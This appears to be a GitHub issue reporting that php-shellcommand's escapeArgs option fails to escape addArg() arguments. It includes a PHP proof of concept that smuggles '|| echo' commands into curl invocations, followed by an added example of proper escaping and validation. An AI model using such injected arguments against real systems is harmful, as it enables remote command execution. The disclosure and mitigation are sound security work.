escapeArgs option is not working properly #44

Closed
@Kirill89

I expect that addArg() escapes all arguments, preventing the possibility of command injection from untrusted sources.

Because in the README.md I see:

  • Handle argument escaping

  • $escapeArgs: Whether to escape any argument passed through addArg(). Default is true.

But this does not actually happen.

PoC:

<?php
require_once 'vendor/autoload.php';

use mikehaertl\shellcommand\Command;

$command = new Command(array(
    'command' => 'curl',
    'escapeArgs' => true,
));
// In this example "escapeArgs" is set to "true", but escaping does not happen.
$command->addArg('http://example.com --wrong-argument || echo "RCE 1"');
$command->execute();
echo $command->getOutput(); // RCE 1

$command = new Command(array(
    'command' => 'curl http://example.com',
    'escapeArgs' => true,
));
$command->addArg('http://example.com');
// In this example, the second argument will be escaped properly, but the first one will not.
$command->addArg('--header foo --wrong-argument || echo "RCE 2" ||', 'bar');
$command->execute();
echo $command->getOutput(); // RCE 2

Disclaimer

This thread was initially started as a private email conversation. @mikehaertl asked me to open an issue here.
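
The check below is an added example for this page, not code from php-shellcommand or from the issue author: it passes the two PoC strings through PHP's escapeshellarg() and shows that each one then reaches the program as a single argument. It assumes a POSIX shell; safeArgv() and assertHttpUrl() are hypothetical helper names, and printf stands in for curl so that nothing is fetched.

```php
<?php
// Added illustration, not part of php-shellcommand.
// safeArgv() and assertHttpUrl() are hypothetical helpers.

/** Quote every element so the shell sees each one as exactly one word. */
function safeArgv(string $binary, array $args): string
{
    $words = [escapeshellarg($binary)];
    foreach ($args as $arg) {
        $words[] = escapeshellarg((string) $arg);
    }
    return implode(' ', $words);
}

/** Accept only a plain http(s) URL without whitespace. */
function assertHttpUrl(string $value): string
{
    $scheme = parse_url($value, PHP_URL_SCHEME);
    if (!in_array($scheme, ['http', 'https'], true) || preg_match('/\s/', $value)) {
        throw new InvalidArgumentException('not a plain http(s) URL');
    }
    return $value;
}

// Constructed sample input: the two strings used in the PoC above.
$untrusted = [
    'http://example.com --wrong-argument || echo "RCE 1"',
    '--header foo --wrong-argument || echo "RCE 2" ||',
];

foreach ($untrusted as $value) {
    // printf prints each argument it receives on its own bracketed line,
    // so one line of output means the value stayed one argument.
    $cmd = safeArgv('printf', ['[%s]\n', $value]);
    echo $cmd, "\n", shell_exec($cmd);

    // Quoting alone does not make the value a valid URL; validate as well.
    try {
        assertHttpUrl($value);
        echo "accepted\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Quoting stops the shell from interpreting `||`, but a value that begins with `-` is still a single word that the called program may parse as an option, which is why the example also validates the value against an allowlist.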
